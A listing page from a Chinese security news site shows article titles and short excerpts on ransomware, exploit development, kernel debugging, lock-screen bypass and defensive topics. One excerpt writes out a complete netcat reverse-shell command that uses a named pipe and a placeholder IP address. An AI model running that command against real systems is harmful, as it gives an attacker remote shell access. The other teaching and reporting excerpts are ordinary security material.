欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!
  • 勒索软件加密方法总结
  • 一、介绍 1.1 勒索软件 勒索软件是计算机恶意软件的一种类型,它可以绑架用户的文件,使用户无法访问到文件,并向用户要求赎金,用于恢复文件。勒索软件的目标通常是用户的个人数据,包括文档、数据库、源代码、......
  • 所属分类:系统安全 更新时间:2017-01-19 相关标签: 阅读全文...
  • 为何软件需要1个数字签名证书?
  • 搞软件开发的大概都会了解到需要给软件进行签名加密,那么这个所谓的数字签名是什么呢?有了数字签名和没有进行数字签名有何区别呢? 1. 什么是数字签名?为何需要数字签名? 我们来看下微软这个巨头是如......
  • 所属分类:系统安全 更新时间:2017-01-19 相关标签: 阅读全文...
  • WhatsApp的“后门”是故意为之,还是提升体验的副产品?
  • 来自加州大学的安全研究人员Tobias Boelter最近发布了一份报告,报告中提到像Whatsapp和Telegram这样的端对端加密通信服务商所采用的基于信号协议的加密方式存在后门。《卫报》率先对此进行了报道,生成WhatsApp、入......
  • 所属分类:系统安全 更新时间:2017-01-19 相关标签: 阅读全文...
  • 绕过Windows 10的CFG机制
  • 本文是2016年7月一些研究的结果,但是直到现在才能发布。在6月,Theori发布了一篇博文关于IE的漏洞MS16-063,他们写的利用是针对Windows7上IE 11版本,并且他们认为因为Windows 10 的CFG机制无法在Windows 10利用。本......
  • 所属分类:系统安全 更新时间:2017-01-19 相关标签: 阅读全文...
  • 使用KGDB实现Android内核调试
  • 内核调试给了安全研究员在分析时一个监视和控制设备的工具。在桌面平台如Windows、macOS和linux,非常简单实现。然而,在安卓设备,例如谷歌Nexus 6P,上面内核调试很困难。本文,我将描述一种在安卓设备上面内核调试......
  • 所属分类:系统安全 更新时间:2017-01-19 相关标签: 阅读全文...
  • 攻击UEFI运行时服务和Linux
  • 具有物理访问权限的攻击者能够在许多具有DMA-直接内存访问的完全修补的计算机上攻击固件。一旦在UEFI/EFI运行时服务中执行代码,就可以使用脚本来控制正在运行的Linux系统。 Linux 4.8内核完全随机化了内核的物理内......
  • 所属分类:系统安全 更新时间:2017-01-19 相关标签: 阅读全文...
  • 关于数据库加密,你不能不知道的秘密(一)
  • 前言 数据库是所有信息系统的核心,数据库的安全通常是指其中所存数据的安全,是网络安全、信息安全的重要组成部分。而对数据库中数据的加密保护,是数据库安全的重要内容。但是数据库加密具有相对较高的技术门槛,......
  • 所属分类:系统安全 更新时间:2017-01-18 相关标签: 阅读全文...
  • 教你如何防止黑客入侵
  • 今天我们要讨论的是保护系统安全的方法,我收集了适合从专业系统管理员到入门小白都可以掌握的防止系统被入侵的方法: 1. 备份你的数据,如果你被勒索软件入侵,如果你有备份的话,你将毫无损失。 2. 如果你需要在......
  • 所属分类:系统安全 更新时间:2017-01-18 相关标签: 阅读全文...
  • 智能电量表和电气设施都存在安全隐患
  • 智能电表中严重的安全漏洞将会继续让用户和电力基础设施暴露于恶意网络攻击的安全风险之中。但更加可怕的是,有些安全专家认为黑客甚至可以直接让这些智能电表爆炸。 智能电表可以让用户更加清楚地了解自家的用电......
  • 所属分类:系统安全 更新时间:2017-01-16 相关标签: 阅读全文...
  • 教你用最简单的命令查看你电脑是否被黑客监控
  • 按Win+R键调出运行对话框,输入“cmd”(不含引号,下同)并按回车键打开命令提示符窗口;输入命令“netstat -b 5 > aaa.txt”并按回车键执行;大约2分钟的时候,按Ctrl+C中止命令的执行。 DOS命令netstat用来显示......
  • 所属分类:系统安全 更新时间:2017-01-15 相关标签: 阅读全文...
  • 使用IP筛选器创建安全规则限制端口
  • 如何使用windows防火墙来限制任意指定端口。顺便提到了IP筛选器,下面继续和大家分享如何利用IP筛选器建立规则,限制端口的数据通信,今天的内容可能就比较繁琐一点,请大家耐心,也可以先收藏起来等有空了慢慢测试。......
  • 所属分类:系统安全 更新时间:2017-01-15 相关标签: 阅读全文...
  • 内核调试入门教程
  • 对于内核调试来说,无论是环境的搭设,还是调试工作本身都是相当困难的——从前我就是这么认为的,但是事实证明,实际上它比我们想象的要更容易一些。 需要准备的软件 IDAPro 6.8+ 在本文中,我们将使用......
  • 所属分类:系统安全 更新时间:2017-01-14 相关标签: 阅读全文...
  • 常见内核后门分析
  • 科普,科普,科普,重要的事情说三遍,请各位内核牛绕道。 最近哥们给我秀起了内核文件隐藏、32位下给力的Hacker Defender,号称网站管理员无法解决,在t00ls上也看见有童鞋在问相关的问题说用户被隐藏怎么找都找不......
  • 所属分类:系统安全 更新时间:2017-01-12 相关标签: 阅读全文...
  • 利用Volatility进行Windows内存取证分析(一):初体验
  • 承接上文,上文中使用cuckoo沙箱的时候提到过,分析恶意代码的时候,首先利用沙箱做粗略分析,然后可以目标程序进行动态分析(OD,Windbg调试)或者静态分析(IDA静态反汇编).如果嫌每次逆向麻烦的话,同样可以借助Volatility......
  • 所属分类:系统安全 更新时间:2017-01-11 相关标签: 阅读全文...
  • 疑似俄罗斯黑客团体Fancy Bear使用的攻击程序源码文件
  • 近期,安全研究人员在Github上发现了疑似俄罗斯黑客团体Fancy Bear使用的网络攻击相关源代码程序,这些程序用于攻击端与受害端的通信控制。通过分析发现,黑客使用了Gmail邮箱进行加密信息的接发交流。而据源码分享......
  • 所属分类:系统安全 更新时间:2017-01-11 相关标签: 阅读全文...
  • Windows exploit开发系列教程:内核利用- >内存池溢出
  • 你好,欢迎回到Windows漏洞利用开发系列教程的第16部分。今天我们将使用@HackSysTeam有漏洞的驱动来进行内存池溢出利用。我再次强烈地建议读者在进入这篇文章之前去回顾下面列出的资源,另外关于内存池分配的更多背景......
  • 所属分类:系统安全 更新时间:2017-01-10 相关标签: 阅读全文...
  • 智能门锁联网的安全性,能相信吗?
  • 万物互联已是时代大势所趋。不可否认,互联给生活带来了极大的便利,但去年315曝光了智能家居的安全隐患之后,在社会上着实引起了一股恐慌潮,对于智能家居产品,普通大众最关注的仍然是安全问题。 说到安全问题......
  • 所属分类:系统安全 更新时间:2017-01-08 相关标签: 阅读全文...
  • 手机上使用vpn是否安全?会不会有密码泄露的情况发生?
  • 手机用户或电脑用户使用VPN首要目标是什么? 将数据加密, 无障碍穿越 中间大防火墙(无法解密), 到达VPN服务器解密,然后再以原始数据格式访问最终的服务器。 如果没有VPN,用户访问最终服务器的明文报文会被大......
  • 所属分类:系统安全 更新时间:2017-01-08 相关标签: 阅读全文...
  • 什么是堡垒机?看完这篇你就懂了
  • 刚明白云主机是什么,又接到个需求采购“云堡垒机”。这年头,做采购不懂点技术都不行! 云堡垒机是什么?能吃么? 那么,什么是云堡垒机? 一般说来,运维堡垒主机是种具备强大防御功能和安全审计功能的服务器。......
  • 所属分类:系统安全 更新时间:2017-01-08 相关标签: 阅读全文...
  • 让你的安卓手机变成HID渗透工具之badandroid
  • Step 1: 准备工作 1.首先需要一部安卓手机(为了避免不必要的折腾您的手机最好在下面连接的列表里面,如果不在,需要您具备编译对应安卓内核的条件,具体如何编译内核github中给出了概述,如果您有什么问题可以私下......
  • 所属分类:系统安全 更新时间:2017-01-05 相关标签: 阅读全文...
  • Kali下安装Shadowsocks与利用ss和ProxyChains实现任意应用代理
  • 在安装了kali后在网上搜过很多次“跨栏”的姿势,但是搜到的答案要么很麻烦,要么介绍的不够详细易懂,所以就萌生了一个自己去整理一下,总结出一个简单易用教程的想法,仅提供给刚刚使用KaliLinux的萌新们做一个参考......
  • 所属分类:系统安全 更新时间:2017-01-01 相关标签: 阅读全文...
  • [TIP]NC不使用-e选项反弹shell
  • 攻击方执行: nc -lnvp 4430 被攻击方执行: mknod /tmp/backpipe p /bin/sh 0/tmp/backpipe | nc 192.168.xx.xx 4430 1>/tmp/backpipe 网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通......
  • 所属分类:系统安全 更新时间:2016-12-31 相关标签: 阅读全文...
  • Fansmitter :利用声波入侵物理隔离系统
  • 物理隔离是指通过物理手段将目标系统和因特网以及其他一些不安全的网络进行隔离的一种网络安全措施。在一些需要规避敏感或者关键信息泄露风险的系统中这种措施经常会被采用比如军事防御系统、关键基础设施指挥和控制......
  • 所属分类:系统安全 更新时间:2016-12-29 相关标签: 阅读全文...
  • NC后门技术(shellcode版)
  • 免责声明:小心!不要将这个程序(技术)使用在你编写的软件中,否则可能会给自己带来牢狱之灾。 一、引言什么是NetCat(瑞士军刀) Netcat是一个unix实用程序,它可以实现使用TCP或者UDP协议来实现网络传输数据的......
  • 所属分类:系统安全 更新时间:2016-12-29 相关标签: 阅读全文...
  • 七种方法绕过安卓手机锁屏
  • 为了避免手机中一些重要的隐私信息,被其他人获取或访问到,例如:短信、通讯录、照片等内容。我们通常都会设置锁屏,来保护我们的手机。而在 Android智能机中,最常用的安全措施是模式锁定,PIN码或数字密码锁屏。 ......
  • 所属分类:系统安全 更新时间:2016-12-28 相关标签: 阅读全文...
  • BackdoorMan,帮你找到系统中的后门文件
  • BackdoorMan是一款采用Python语言开发的开源工具,它可以帮助你找出系统中的恶意文件、隐藏的PHP脚本以及可疑的Shell脚本。你可以在BackdoorMan中指定一个扫描路径,它会自动检测该目录中是否存在上述可疑文件。 ......
  • 所属分类:系统安全 更新时间:2016-12-27 相关标签: 阅读全文...
  • KALI LINUX安装Metasploitable 3
  • 为了满足你们强烈的欲望,这里就再介绍一下KALI Linux 最新版环境下安装Metasploitable 3的步骤吧,不要在虚拟机中再安装虚拟机,否则可能会识别不了BIOS中的VT-X是否开启,我这KALI LINUX 64位是直接安装在电脑上的......
  • 所属分类:系统安全 更新时间:2016-12-25 相关标签: 阅读全文...
  • 第一次遇见服务器被黑客攻击,心情是复杂的
  • 为了能够远程访问mysql数据库,然后就给mysql的账户配置了所有的访问权限,而且是对所有表的访问权限,其中包括了系统表。这样一来,一旦mysql出现漏洞,就可以使用访问系统表,执行各种操作,来形成破坏。 这一次的......
  • 所属分类:系统安全 更新时间:2016-12-23 相关标签: 阅读全文...
  • iOS安全审计入门
  • 此前有人统计过2015年漏洞最多的产品,苹果的OSX与iOS系统分别占据第一二名,虽有人怀疑统计数据可能存在重复的不准确情况,但相信大趋势是不会变的。而今年国内一家机构发布的手机安全报告指出,32.3%的用户明确表示......
  • 所属分类:系统安全 更新时间:2016-12-23 相关标签: 阅读全文...
  • 本类最新更新
    • 本类热门文章
      • 最新下载
        • 标签云集